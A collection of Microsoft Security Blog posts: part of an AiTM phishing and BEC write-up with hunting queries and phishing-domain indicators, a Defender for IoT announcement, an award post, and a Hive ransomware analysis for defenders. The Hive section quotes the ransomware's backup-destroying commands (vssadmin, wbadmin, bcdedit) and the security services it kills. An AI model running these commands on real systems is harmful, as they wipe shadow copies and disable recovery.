On one occasion, the attacker conducted multiple fraud attempts simultaneously from the same compromised mailbox. Every time the attacker found a new fraud target, they updated the Inbox rule they created to include these new targets’ organization domains.

Below is a summary of the campaign’s end-to-end attack chain based on threat data from Microsoft 365 Defender:

Timeline with bulleted text lists summarizing the phishing campaign's post-breach BEC activities. The lists contain additional technical details, application client IDs, properties, and events.
Figure 11. AiTM phishing campaign and follow-on BEC in the context of Microsoft 365 Defender threat data

Defending against AiTM phishing and BEC

This AiTM phishing campaign is another example of how threats continue to evolve in response to the security measures and policies organizations put in place to defend themselves against potential attacks. And since credential phishing was leveraged in many of the most damaging attacks last year, we expect similar attempts to grow in scale and sophistication.

While AiTM phishing attempts to circumvent MFA, it’s important to underscore that MFA implementation remains an essential pillar in identity security. MFA is still very effective at stopping a wide variety of threats; its effectiveness is why AiTM phishing emerged in the first place. Organizations can thus make their MFA implementation “phish-resistant” by using solutions that support Fast ID Online (FIDO) v2.0 and certificate-based authentication.

Defenders can also complement MFA with the following solutions and best practices to further protect their organizations from such types of attacks:

  • Enable conditional access policies. Conditional access policies are evaluated and enforced every time an attacker attempts to use a stolen session cookie. Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as compliant devices or trusted IP address requirements.
  • Invest in advanced anti-phishing solutions that monitor and scan incoming emails and visited websites. For example, organizations can leverage web browsers that can automatically identify and block malicious websites, including those used in this phishing campaign.
  • Continuously monitor for suspicious or anomalous activities:
    • Hunt for sign-in attempts with suspicious characteristics (for example, location, ISP, user agent, use of anonymizer services).
    • Hunt for unusual mailbox activities such as the creation of Inbox rules with suspicious purposes or unusual amounts of mail item access events by untrusted IP addresses or devices.
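One way to hunt for the two signals just listed, as an added example that is not Microsoft 365 Defender’s detection logic: the Python below flags a session identifier reused from a different IP address or user agent than the sign-in that created it (the cookie replay described earlier), and Inbox rules that match a sender, file its mail in a rarely watched folder and mark it read (the rule the attacker used to hide the fraud target’s replies). It assumes sign-in records carry a session identifier tied to the session cookie; the field names, users, addresses and rule records are constructed.

```python
from dataclasses import dataclass
from datetime import datetime


@dataclass
class SignIn:
    ts: str           # ISO 8601 timestamp, naive UTC (constructed)
    user: str
    session_id: str   # identifier the service ties to the session cookie (assumed field)
    ip: str
    user_agent: str
    app: str          # application the session was used against


@dataclass
class InboxRule:
    ts: str
    user: str
    sender_contains: str   # condition: sender address contains this string ("" = none)
    move_to: str           # destination folder ("" = none)
    mark_read: bool


# Folders a user rarely looks at; the campaign's attacker used "Archive".
HIDING_FOLDERS = {"Archive", "Deleted Items", "RSS Feeds", "Junk Email"}


def find_cookie_replay(signins) -> list:
    """Flag a session ID reused from a different IP or user agent than the sign-in
    that created it. Returns one dict per suspected replay."""
    origin = {}
    findings = []
    for ev in sorted(signins, key=lambda e: e.ts):
        key = (ev.user, ev.session_id)
        if key not in origin:
            origin[key] = ev          # first sighting: the sign-in that minted the cookie
            continue
        first = origin[key]
        if ev.ip != first.ip or ev.user_agent != first.user_agent:
            delta = datetime.fromisoformat(ev.ts) - datetime.fromisoformat(first.ts)
            findings.append({
                "user": ev.user,
                "session_id": ev.session_id,
                "origin_ip": first.ip,
                "replay_ip": ev.ip,
                "replay_app": ev.app,
                "minutes_after_signin": round(delta.total_seconds() / 60, 1),
            })
    return findings


def find_suspicious_rules(rules) -> list:
    """Flag rules that single out a sender, move its mail where the user won't look,
    and mark it read: the combination used to hide the fraud target's replies."""
    return [
        r for r in rules
        if r.sender_contains and r.move_to in HIDING_FOLDERS and r.mark_read
    ]


# Constructed events. In an AiTM attack the victim's own sign-in arrives from the
# proxy's address; the replay comes from wherever the attacker egresses.
SAMPLE_SIGNINS = [
    SignIn("2022-06-01T09:00:00", "alice@contoso.example", "sess-7f3a", "198.51.100.7",
           "Mozilla/5.0 (Macintosh) Firefox/101.0", "OfficeHome"),
    SignIn("2022-06-01T09:05:00", "alice@contoso.example", "sess-7f3a", "192.0.2.55",
           "Mozilla/5.0 (Windows NT 10.0) Chrome/102.0", "Exchange Online"),
    SignIn("2022-06-01T09:10:00", "bob@contoso.example", "sess-c210", "203.0.113.9",
           "Mozilla/5.0 (Windows NT 10.0) Edge/102.0", "OfficeHome"),
    SignIn("2022-06-01T09:12:00", "bob@contoso.example", "sess-c210", "203.0.113.9",
           "Mozilla/5.0 (Windows NT 10.0) Edge/102.0", "Exchange Online"),
]

SAMPLE_RULES = [
    InboxRule("2022-06-01T09:20:00", "alice@contoso.example", "fabrikam.example", "Archive", True),
    InboxRule("2022-06-01T09:30:00", "bob@contoso.example", "newsletter", "Newsletters", False),
]

if __name__ == "__main__":
    for f in find_cookie_replay(SAMPLE_SIGNINS):
        print("cookie replay:", f)
    for r in find_suspicious_rules(SAMPLE_RULES):
        print("suspicious rule:", r)
```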

Coordinated threat defense with Microsoft 365 Defender

Microsoft 365 Defender provides comprehensive protection against this AiTM phishing campaign by correlating threat data from various domains. It also coordinates threat defense against the end-to-end attack chain using multiple solutions and has advanced hunting capabilities that allow analysts to inspect their environments further and surface this threat.

Leveraging its cross-signal capabilities, Microsoft 365 Defender alerts customers using Microsoft Edge when a session cookie gets stolen through AiTM phishing and when an attacker attempts to replay the stolen session cookie to access Exchange Online:

Partial screenshot of Microsoft 365 Defender displaying the alert "Stolen session cookie was used".
Figure 12. Microsoft 365 Defender detecting an attempt to use a stolen session cookie to sign into Exchange Online

Microsoft 365 Defender’s unique incident correlation technology also lets defenders see all the relevant alerts related to an AiTM phishing attack pieced together into a single comprehensive view, thus allowing them to respond to such incidents more efficiently:

Graphical user interface of Microsoft 365 Defender portal. The left panel displays a bar graph of active alerts. The right panel provides details of the alerts' scope and supporting evidence.
Figure 13. Microsoft 365 Defender incident page correlating all relevant alerts related to an AiTM phishing attempt

Microsoft 365 Defender is backed by threat experts who continuously monitor the computing landscape for new attacker tools and techniques. Their monitoring not only helps alert customers to a possible incident (such as a potential cookie theft during an authentication session), but their research on constantly evolving phishing techniques also enriches the threat intelligence that feeds into the protection technologies described above.

Microsoft Defender for Office 365 detects threat activity associated with this phishing campaign through the following email security alerts. Note, however, that these alerts may also be triggered by unrelated threat activity. We’re listing them here because we recommend that these alerts be investigated and remediated immediately.

  • Email messages containing malicious file removed after delivery​. This alert is generated when any messages containing a malicious file are delivered to mailboxes in an organization. Microsoft removes the infected messages from Exchange Online mailboxes using zero-hour auto purge (ZAP) if this event occurs.
  • Email messages from a campaign removed after delivery​. This alert is generated when any messages associated with a campaign are delivered to mailboxes in an organization. Microsoft removes the infected messages from Exchange Online mailboxes using ZAP if this event occurs.

Microsoft Defender for Cloud Apps detects this AiTM phishing and BEC campaign through the following alerts:

  • Suspicious inbox manipulation rule. The attackers set an Inbox rule to hide their malicious activities. Defender for Cloud Apps identifies such suspicious rules and alerts users when detected.
  • Impossible travel activity. The attackers used multiple proxies or virtual private networks (VPNs) from various countries or regions. Sometimes, their attack attempts happen at the same time the actual user is signed in, thus raising impossible travel alerts.
  • Activity from infrequent country. Because the attackers used multiple proxies or VPNs, on certain occasions, the egress endpoints of these VPN and proxy servers are uncommon for the user, thus raising this alert.

Azure AD Identity Protection automatically detects and remediates identity-based risks. It detects suspicious sign-in attempts and raises any of the following alerts:

  • Anomalous Token. This alert flags a token with unusual characteristics, such as an abnormal token lifetime or a token replayed from an unfamiliar location.
  • Unfamiliar sign-in properties. In this phishing campaign, the attackers used multiple proxies or VPNs originating from various countries or regions unfamiliar to the target user.
  • Unfamiliar sign-in properties for session cookies. This alert flags anomalies in the token claims, token age, and other authentication attributes.
  • Anonymous IP address. This alert flags sign-in attempts from anonymous IP addresses (for example, Tor browser or anonymous VPN).

In addition, Continuous Access Evaluation (CAE) revokes access in near real time when a change in user conditions raises risk, such as when a user is terminated or moves to an untrusted location.

Learn how you can stop attacks through automated, cross-domain security with Microsoft 365 Defender.

Microsoft 365 Defender Research Team

Microsoft Threat Intelligence Center (MSTIC)


Indicators of compromise (IOCs)

Redirector domains

  • 32sssaawervvvv[.]biz
  • adminmmi[.]biz
  • auth2022[.]live
  • cleanifl[.]com
  • docpmsi[.]us
  • vrtlsrvmapp[.]biz
  • vrtofcvm[.]live

Phishing site domains  

  • login[.]actionspsort[.]cam
  • login[.]akasmisoft[.]xyz
  • login[.]aueuth11[.]live
  • login[.]auth009[.]xyz
  • login[.]auth2022[.]live
  • login[.]auth83kl[.]live
  • login[.]bittermann-hh[.]co
  • login[.]cbhbanlc[.]com
  • login[.]cleanifl[.]com
  • login[.]clfonl365[.]xyz
  • login[.]gddss36[.]live
  • login[.]grodno-pl[.]com
  • login[.]hfs923[.]shop
  • login[.]karlandpearson[.]com
  • login[.]klm2136[.]click
  • login[.]login-micro[.]mcrsfts-passwdupdate[.]com
  • login[.]mcrosfts-updata[.]live
  • login[.]mcrosfts-update[.]cloud
  • login[.]mcrosfts-update[.]digital
  • login[.]mcrosftts-update[.]cloud
  • login[.]mcrsft-audio[.]xyz
  • login[.]mcrsfts-cloud[.]live
  • login[.]mcrsfts-passwd[.]cloud
  • login[.]mcrsfts-passwd[.]digital
  • login[.]mcrsfts-passwdupdate[.]com
  • login[.]mcrsfts-update[.]cloud
  • login[.]mcrsfts-update[.]digital
  • login[.]mcrsfts-virtualofficevm[.]com
  • login[.]mcrsftsvm-app[.]digital
  • login[.]mcrsftsvm-app[.]live
  • login[.]mcrsfts-voiceapp[.]digital
  • login[.]mcrsftsvoice-mail[.]cloud
  • login[.]microsecurity[.]us
  • login[.]microstoff[.]xyz
  • login[.]mljs365[.]xyz
  • login[.]mwhhncndn[.]xyz
  • login[.]mycrsfts-passwd[.]live
  • login[.]qwwxthn[.]xyz
  • login[.]seafoodsconnection[.]com
  • login[.]sunmarks[.]co[.]uk
  • login[.]tfosorcimonline[.]xyz
  • login[.]whitmanlab[.]uk
  • login[.]yi087011[.]xyz

Advanced hunting queries  

When an attacker uses a stolen session cookie, the “SessionId” attribute in the AADSignInEventsBeta table will be identical to the SessionId value used in the authentication process against the phishing site. Use this query to search for cookies that were first seen after OfficeHome application authentication (as seen when the user authenticated to the AiTM phishing site) and then seen being used in other applications from other countries:

//Sessions that started with a browser sign-in to OfficeHome (the app the AiTM proxy authenticates to)
let OfficeHomeSessionIds = 
AADSignInEventsBeta
| where Timestamp > ago(1d)
| where ErrorCode == 0
| where ApplicationId == "4765445b-32c6-49b0-83e6-1d93765276ca" //OfficeHome application 
| where ClientAppUsed == "Browser" 
| where LogonType has "interactiveUser" 
| summarize arg_min(Timestamp, Country) by SessionId;
//The same SessionId later used against a different application, from a different country
AADSignInEventsBeta
| where Timestamp > ago(1d)
| where ApplicationId != "4765445b-32c6-49b0-83e6-1d93765276ca"
| where ClientAppUsed == "Browser" 
| project OtherTimestamp = Timestamp, Application, ApplicationId, AccountObjectId, AccountDisplayName, OtherCountry = Country, SessionId
| join OfficeHomeSessionIds on SessionId
| where OtherTimestamp > Timestamp and OtherCountry != Country

Use this query to summarize for each user the countries that authenticated to the OfficeHome application and find uncommon or untrusted ones:  

AADSignInEventsBeta
| where Timestamp > ago(7d) 
| where ApplicationId == "4765445b-32c6-49b0-83e6-1d93765276ca" //OfficeHome application 
| where ClientAppUsed == "Browser" 
| where LogonType has "interactiveUser" 
| summarize Countries = make_set(Country) by AccountObjectId, AccountDisplayName 

Use this query to find new email Inbox rules created during a suspicious sign-in session:

//Find suspicious tokens tagged by AAD "Anomalous Token" alert
let suspiciousSessionIds = materialize(
AlertInfo
| where Timestamp > ago(7d)
| where Title == "Anomalous Token"
| join (AlertEvidence | where Timestamp > ago(7d) | where EntityType == "CloudLogonSession") on AlertId
| project sessionId = todynamic(AdditionalFields).SessionId);
//Find Inbox rules created during a session that used the anomalous token
let hasSuspiciousSessionIds = isnotempty(toscalar(suspiciousSessionIds));
CloudAppEvents
| where hasSuspiciousSessionIds
| where Timestamp > ago(21d)
| where ActionType == "New-InboxRule"
| where RawEventData.SessionId in (suspiciousSessionIds)

The post From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud appeared first on Microsoft Security Blog.

Introducing security for unmanaged devices in the Enterprise network with Microsoft Defender for IoT

July 11th, 2022

How many IoT devices are used at your company? If yours is like most organizations, there are probably printers, scanners, and fax machines scattered around the office. Perhaps smart TVs are mounted at reception or in the break room to guide visitors and keep employees up-to-date on company events and news. Or maybe highly connected conference systems bring teams together to collaborate. For some organizations, IoT also includes operational technology (OT) devices used in industrial systems and critical infrastructure. You and your employees probably view these devices as tools to help operate more efficiently. Unfortunately, so do cybercriminals.

While IoT devices can easily outnumber managed endpoints like laptops and mobile phones, they often lack the safeguards that would ensure their security. To bad actors, these unmanaged devices can serve as a point of entry, a path for lateral movement, or a means of evasion. The chart below shows a typical attack lifecycle involving two IoT devices, one used as a point of entry and another for lateral movement. Too often, such tactics end in the exfiltration of sensitive information.

Attack lifecycle includes use of IoT devices during intrusion, scanning, exploitation, credential stealing, lateral movement, data theft, and exfiltration stages.

Introducing protection for Enterprise IoT devices in Microsoft Defender for IoT

At the 2021 Microsoft Ignite, we announced the preview of enterprise IoT security capabilities in Microsoft Defender for IoT. With these new capabilities, Defender for IoT adds agentless monitoring to secure enterprise IoT devices connected to IT networks, like Voice over Internet Protocol (VoIP) phones, printers, and smart TVs. A dedicated integration with Microsoft 365 Defender allows Defender for Endpoint customers to extend their extended detection and response (XDR) coverage to include IoT devices. Today, we’re excited to announce the general availability of these capabilities in Defender for IoT.

Defender for IoT covers micro-agents, OT and Enterprise IoT devices with agentless monitoring. For complete protection, Defender for Endpoint covers all managed endpoints.

With this new addition, Defender for IoT now delivers comprehensive security for all endpoint types, applications, identities, and operating systems. The new capabilities allow organizations to get the visibility and insights they need to address complex multi-stage attacks that specifically take advantage of IoT and OT devices to achieve their goals. Customers will now be able to get the same types of vulnerability management, threat detection, response, and other capabilities for enterprise IoT devices that were previously only available for managed endpoints and OT devices.

Further, to make Enterprise IoT security accessible to more customers, we are introducing a dedicated native integration for Microsoft 365 Defender customers. The new integration helps customers to discover and secure IoT devices within Microsoft 365 Defender environments in minutes.

Defender for IoT user interface maps all discovered IoT and OT assets in a single view, allowing users to monitor, sort, and uncover connections across devices.

Identifying unmanaged devices

You can’t secure a device if you don’t know it exists. Taking a thorough inventory of all IoT devices can be expensive, challenging, and time-consuming. Employees may connect IoT devices to the network without first notifying IT or operations.

By using the existing Microsoft Defender for Endpoint clients, which are often deployed pervasively across an organization’s infrastructure, we can provide immediate device discovery with no additional deployment or configuration required. For the most complete view of your IoT and OT devices, and specifically for network segments where Defender for Endpoint sensors are not present, Defender for IoT includes a deployable network sensor that can be used to collect all of the network data it needs for discovery, behavioral analytics, and machine learning.

Understanding device vulnerabilities

Knowing all the devices present in your network is a critical step to securing your IoT—but it’s only the first step. To understand the potential risk that those devices pose to your network and organization, you need to be able to stay on top of insecure configurations and vulnerabilities that may be present within your inventory of devices.

These types of devices are often unpatched, misconfigured, and unmonitored, which makes them an immediate target for an attacker. Defender for IoT assesses all your enterprise IoT devices, offering recommendations in the Microsoft 365 console as part of the ongoing investigation flow for network-based alerts. 

New IoT devices are being introduced into an environment all the time. Because of that, the identification and risk assessment processes run continuously within Defender for IoT to ensure maximum visibility and posture at all times.

Securing IoT devices against threats

Threat detection remains one of the most difficult tasks in the IoT domain. Defender for IoT customers benefit from the machine learning and threat intelligence obtained from trillions of signals collected daily across the global Microsoft ecosystem (like email, endpoints, cloud, Microsoft Azure Active Directory, and Microsoft 365), augmented by IoT- and OT-specific intelligence. By applying machine learning and threat intelligence, we help customers improve the alert signal-to-noise ratio by providing prioritized incidents that render end-to-end attacks in complete context rather than an endless list of uncorrelated alerts.

Just recently, this approach enabled Defender for IoT to rank number one in threat visibility coverage in the MITRE ATT&CK for ICS evaluation, successfully detecting malicious activity for 100 percent of major attack steps and 96 percent of all adversary sub-steps, with the fewest missed detections of any vendor.

Defender for IoT: Complete coverage across all IoT/OT

It is certain that the demand for digital transformation and pressure to remain competitive will continue incentivizing organizations to embrace more IoT technologies, whether they are smart TVs in offices or industrial controllers in plants. Chief Information Security Officers will soon be responsible for an attack surface area that is many times larger than their managed device footprint. With the latest release in Defender for IoT, we’re extending coverage to enterprise IoT devices to help customers remain secure across the entire spectrum of their IoT technologies. What’s more, for the first time we’re enabling our Defender for Endpoint customers to gain visibility into their IoT devices within minutes and without buying or deploying any additional technologies or products.

Microsoft Defender for IoT remains a major component of the broader Microsoft SIEM and XDR solutions. Through native integration with Microsoft Defender and Microsoft Sentinel, we can provide customers with the automation and visualization tools they need to address attacks crossing IT and OT network boundaries. These integrations also empower analysts to perform incident response holistically rather than as separate disconnected attacks that require extensive manual investigations to bring together. With these efficiency gains, organizations can stop attacks and bring their environments back to a pre-breach state far more quickly.

We’re excited to reach this major milestone on our journey to securing customers in IoT and OT and invite you to explore how Defender for IoT can help your organization.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Introducing security for unmanaged devices in the Enterprise network with Microsoft Defender for IoT appeared first on Microsoft Security Blog.

KuppingerCole rates Microsoft as outstanding in functionality for secure collaboration

We are excited to share that Microsoft has been rated “Outstanding in Functionality” in the KuppingerCole Market Compass for Secure Collaboration, May 2022. Microsoft was also the only company to be awarded the highest possible score of “Strong Positive” in all five categories: security, deployment, interoperability, usability, and market standing for the Microsoft Purview Information Protection platform.

KuppingerCole graphic awarding Microsoft the Outstanding in Functionality rating.

The Secure Collaboration Market Compass report covers solutions that protect sensitive data, which includes intellectual property or information restricted to certain audiences (such as trade secrets, some legal contracts, agreements, and financial statements), along with personally identifiable information (PII) and health information for regulatory standards such as General Data Protection Regulation (GDPR), California Consumer Privacy Act (CCPA), and Health Insurance Portability and Accountability Act (HIPAA). As companies shift towards remote hybrid work, protecting sensitive data that is continuously created and shared among employees, contractors, partners, and suppliers—while not impeding worker productivity—is becoming increasingly important. Enterprises today face the challenge of classifying large volumes of data, especially personal data, which is required by privacy regulations and laws worldwide.

At Microsoft, our goal is to provide a built-in, intelligent, unified, and extensible solution to protect sensitive data across your digital estate—in Microsoft 365 cloud services, on-premises, third-party software as a service (SaaS) applications, and more. With Microsoft Purview Information Protection, we are building a unified set of capabilities for classification, labeling, and protection, not only in Microsoft Office apps but also in other popular productivity services where the information resides (such as SharePoint Online, Exchange Online, and Microsoft Teams), as well as endpoint devices.

“Microsoft Purview Information Protection provides a sophisticated classification system that can apply labeling to a document based on the creator, the context in which it was created, and/or the content within the document. The functionality is natively embedded into Office services and apps, and third-party applications via the information protection SDK. Sensitive information is discovered and labeled with out-of-the-box, custom, and machine learning (trainable) functionality,” Annie Bailey, KuppingerCole analyst, writes in the report. “Information such as credit card, social security number (SSN), person names, licenses, and business categories like healthcare or financial can be classified out-of-the-box. Custom fields include RegEx, Dictionary, Fingerprint, Named entities detection (e.g., person name, address, medical terms), Exact Data Match, and credentials.”

We are also pleased that KuppingerCole recognizes the breadth and depth of our Microsoft Purview Information Protection platform and called out these strengths:

•  Double Key Encryption provides additional security and governance control.
•  Built into frequently used enterprise applications.
•  Simulations to test policy effectiveness.
•  Interoperates with Microsoft and third-party event logs.
•  Automated and manual classification options.
•  Coverage of structured and unstructured data in the Microsoft environment.
•  Data loss prevention functionality in Teams chat.
•  Option for no configuration, default classification.

We have made significant investments in our Microsoft Purview solutions (such as Data Loss Prevention, Compliance Manager, Data Lifecycle Management, Insider Risk Management, and eDiscovery) and Microsoft Priva privacy solution that leverage our advanced classifiers, unified labeling and protection, sensitive information types, and policy authoring templates provided by our Microsoft Purview Information Protection platform.

More than 200 partners are part of our Microsoft Intelligent Security Association (MISA). Partners can leverage our labeling features through our Information Protection SDK, data connectors, and Graph APIs to provide integrations with Microsoft applications and services, security and compliance solutions, and their own products.

We are honored to have been designated as “Outstanding in Functionality” by KuppingerCole and rated the highest possible score of “Strong Positive” in five different categories.

Learn more

We invite you to read the full KuppingerCole Secure Collaboration report. For more information on our Microsoft Purview solutions, please visit our website. Visit the Microsoft Purview Information Protection platform page to learn more about how to protect your data wherever it lives.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post KuppingerCole rates Microsoft as outstanding in functionality for secure collaboration appeared first on Microsoft Security Blog.

Hive ransomware gets upgrades in Rust

Hive ransomware is only about one year old, having been first observed in June 2021, but it has grown into one of the most prevalent ransomware payloads in the ransomware-as-a-service (RaaS) ecosystem. With its latest variant carrying several major upgrades, Hive also proves it’s one of the fastest evolving ransomware families, exemplifying the continuously changing ransomware ecosystem.

The upgrades in the latest variant are effectively an overhaul: the most notable changes include a full code migration to another programming language and the use of a more complex encryption method. The impact of these updates is far-reaching, considering that Hive is a RaaS payload that Microsoft has observed in attacks against organizations in the healthcare and software industries by large ransomware affiliates like DEV-0237.

Microsoft Threat Intelligence Center (MSTIC) discovered the new variant while analyzing detected Hive ransomware techniques for dropping .key files. We know that Hive drops its encryption keys file, which contains encrypted keys used to decrypt encrypted files, and uses a consistent naming pattern:

(e.g., BiKtPupMjgyESaene0Ge5d0231uiKq1PFMFUEBNhAYv_.key.ab123)

These .key files were missing the [VICTIM_IDENTIFIER] part of the file name, prompting deeper analysis of the Hive ransomware that dropped them. This analysis led to the discovery of the new Hive variant and its multiple versions, which exhibit slightly different available parameters in the command line and in the executed processes.

Analyzing these patterns in samples of the new variants, we discovered even more samples, all with a low detection rate and none being correctly identified as Hive. In this blog we will share our in-depth analysis of the new Hive variant, including its main features and upgrades, with the aim of equipping analysts and defenders with information to better identify and protect organizations against malware attacks relying on Hive.

Analysis and key findings

The switch from GoLang to Rust

The main difference between the new Hive variant and old ones is the programming language used. The old variants were written in Go (also referred to as GoLang), while the new Hive variant is written in Rust.

Hive isn’t the first ransomware written in Rust—BlackCat, another prevalent ransomware, was the first. By switching the underlying code to Rust, Hive benefits from the following advantages that Rust has over other programming languages:

  • It offers memory, data type, and thread safety
  • It has deep control over low-level resources
  • It has a user-friendly syntax
  • It has several mechanisms for concurrency and parallelism, thus enabling fast and safe file encryption
  • It has a good variety of cryptographic libraries
  • It’s relatively more difficult to reverse-engineer

String encryption

The new Hive variant uses string encryption that can make it more evasive. Strings reside in the .rdata section and are decrypted during runtime by XORing with constants. The constants that are used to decrypt the same string sometimes differ across samples, making them an unreliable basis for detection.

For example, let’s look at the section where part of the string “!error no flag -u <login>:<password> provided” is decrypted. In one sample (SHA-256: f4a39820dbff47fa1b68f83f575bc98ed33858b02341c5c0464a49be4e6c76d3), the constants are 0x9F2E3F1F and 0x95C9:

Partial screenshot of a code-level analysis of a Hive sample.
Figure 1 – String decryption using constants 0x9F2E3F1F and 0x95C9

In another sample (SHA-256: 6e5d49f604730ef4c05cfe3f64a7790242e71b4ecf1dc5109d32e811acf0b053), the constants are 0x3ECF7CC4 and 0x198F:        

Partial screenshot of a code-level analysis of a Hive sample.
Figure 2 – String decryption using constants 0x3ECF7CC4 and 0x198F

Some samples do share constants when decrypting the same string. For example, let’s look where the parameter string “-da” is decrypted. In one sample (SHA-256: 88b1d8a85bf9101bc336b01b9af4345ed91d3ec761554d167fe59f73af73f037), the constants are 0x71B4 and 2:

Partial screenshot of a code-level analysis of a Hive sample.
Figure 3 – String decryption using constants 0x71B4 and 2

In another sample (SHA-256: 33744c420884adf582c46a4b74cbd9c145f2e15a036bb1e557e89d6fd428e724), the constants are the same:

Partial screenshot of a code-level analysis of a Hive sample.
Figure 4 – String decryption in a different sample also using constants 0x71B4 and 2

Command-line parameters

In old Hive variants, the username and the password used to access the Hive ransom payment website are embedded in the samples. In the new variant, these credentials must be supplied in the command line under the “-u” parameter, which means that they can’t be obtained by analysts from the sample itself.

Partial screenshot of a command prompt showing an error message.
Figure 5 – Without a username and a password, the sample won’t continue its execution

Like most modern ransomware, Hive introduces command-line parameters, which allow attackers flexibility when running the payload by adding or removing functionality. For example, an attacker can choose to encrypt files on remote shares or local files only or select the minimum file size for encryption. In the new Hive variant, we found the following parameters across different samples:

Parameter        Functionality
-no-local        Don't encrypt local files
-no-mounted      Don't encrypt files on mounted network shares
-no-discovery    Don't discover network shares
-local-only      Encrypt only local files
-network-only    Encrypt only files on network shares
-explicit-only   Encrypt only the specified folder(s). For example, ‘-explicit-only c:\mydocs c:\myphotos’
-min-size        Minimum file size, in bytes, to encrypt. For example, ‘-min-size 102400’ encrypts only files of 100 KB or larger
-da              [Usage is being analyzed.]
-f               [Usage is being analyzed.]
-force           [Usage is being analyzed.]
-wmi             [Usage is being analyzed.]

Overall, it appears different versions have different parameters that are constantly updated. Unlike in previous variants where there was a ‘help’ menu, in the new variant, the attacker must know the parameters beforehand. Since all strings are encrypted, it makes finding the parameters challenging for security researchers.
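The per-sample constants make signatures on the decryption routine unreliable, but an analyst still has one known plaintext: the usage error “!error no flag -u <login>:<password> provided” appears on the console when a sample runs without -u. The Python below is an added example, not Hive’s code and not from the original analysis. It shows how that known plaintext recovers a repeating XOR key from an encrypted string table and then exposes the other strings, including the undocumented command-line parameters. It assumes a single repeating 4-byte key applied over a NUL-separated string table; the real Hive routine combines two constants in a way the analysis above does not spell out, and the string table, key and string list here are constructed for the demonstration.

```python
import re

KEY_LEN = 4  # assumption: one repeating 4-byte XOR key over the whole string table


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Apply a repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def find_xor_key(blob: bytes, known: bytes, key_len: int = KEY_LEN):
    """Slide the known plaintext across the blob. At each position derive the key
    bytes implied by cipher ^ plain and keep the position only if every key slot
    is filled and never contradicted. Returns a list of (offset, key) candidates."""
    hits = []
    for pos in range(len(blob) - len(known) + 1):
        key = bytearray(key_len)
        seen = [False] * key_len
        consistent = True
        for i, p in enumerate(known):
            slot = (pos + i) % key_len          # key slot depends on the absolute offset
            k = blob[pos + i] ^ p
            if seen[slot] and key[slot] != k:
                consistent = False
                break
            key[slot], seen[slot] = k, True
        if consistent and all(seen):
            hits.append((pos, bytes(key)))
    return hits


def printable_strings(data: bytes, min_len: int = 4):
    """Pull out runs of printable ASCII, the way 'strings' would on a decrypted section."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def recover_strings(blob: bytes, known: bytes):
    """Full pipeline: recover the key from the known plaintext, decrypt, list the strings."""
    hits = find_xor_key(blob, known)
    if len(hits) != 1:
        raise ValueError(f"expected exactly one consistent key, got {len(hits)}")
    _, key = hits[0]
    return key, printable_strings(xor_with_key(blob, key))


# Constructed sample: a NUL-separated string table encrypted under a made-up key.
# The key is NOT a constant taken from any Hive sample.
KNOWN_PLAINTEXT = b"!error no flag -u <login>:<password> provided"
SAMPLE_STRINGS = [KNOWN_PLAINTEXT, b"-no-local", b"-no-mounted", b"-no-discovery",
                  b"-local-only", b"-network-only", b"-explicit-only", b"-min-size"]
SAMPLE_KEY = bytes.fromhex("5a3c9e71")
CONSTRUCTED_RDATA = xor_with_key(b"\x00".join(SAMPLE_STRINGS) + b"\x00", SAMPLE_KEY)

if __name__ == "__main__":
    key, strings = recover_strings(CONSTRUCTED_RDATA, KNOWN_PLAINTEXT)
    print("recovered key:", key.hex())
    for s in strings:
        print(s)
```

Against a real sample the blob would be the decrypted-at-runtime region of .rdata dumped from a debugger, and the known plaintext any string the binary is observed to emit; if the routine uses more than one key or a different period, `find_xor_key` returns no single consistent candidate, which is itself a useful signal that the scheme differs from the assumption.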

Stopped services and processes

Like most sophisticated malware, Hive stops services and processes associated with security solutions and other tools that might get in the way of its attack chain. Hive tries to impersonate the process tokens of trustedinstaller.exe and winlogon.exe so it can stop Microsoft Defender Antivirus, among other services.

Hive stops the following services:

windefend, msmpsvc, kavsvc, antivirservice, zhudongfungyu, vmm, vmwp, sql, sap, oracle, mepocs, veeam, backup, vss, msexchange, mysql, sophos, pdfservice, backupexec, gxblr, gxvss, gxclmgrs, gxvcd, gxcimgr, gxmmm, gxvsshwprov, gxfwd, sap, qbcfmonitorservice, qbidpservice, acronisagent, veeam, mvarmor, acrsch2svc

It also stops the following processes:

dbsnmp, dbeng50, bedbh, excel, encsvc, visios, firefox, isqlplussvc, mspub, mydesktopqos, notepad, ocautoupds, ocomm, ocssd, onenote, outlook, sqbcoreservice, sql, steam, tbirdconfig, thunderbird, winword, wordpad, xfssvccon, vxmon, benetns, bengien, pvlsvr, raw_agent_svc, cagservice, sap, qbidpservice, qbcfmonitorservice, teamviewer_service, teamviewer, tv_w32, tv_x64, cvd, saphostexec, sapstartsrv, avscc, dellsystemdetect, enterpriseclient, veeam, thebat, cvfwd, cvods, vsnapvss, msaccess, vaultsvc, beserver, appinfo, qbdmgrn, avagent, spooler, powerpnt, cvmountd, synctime, oracle, wscsvc, winmgmt, *sql*

Launched processes

As part of its ransomware activity, Hive typically runs processes that delete backups and prevent recovery. There are differences between versions, and some samples may not execute all these processes, but one sample that starts the most processes is SHA-256: 481dc99903aa270d286f559b17194b1a25deca8a64a5ec4f13a066637900221e:

  • “vssadmin.exe delete shadows /all /quiet”
  • “wmic.exe shadowcopy delete”
  • “wbadmin.exe delete systemstatebackup”
  • “wbadmin.exe delete catalog -quiet”
  • “bcdedit.exe /set {default} recoveryenabled No”
  • “bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures”
  • “wbadmin.exe delete systemstatebackup -keepVersions:3”
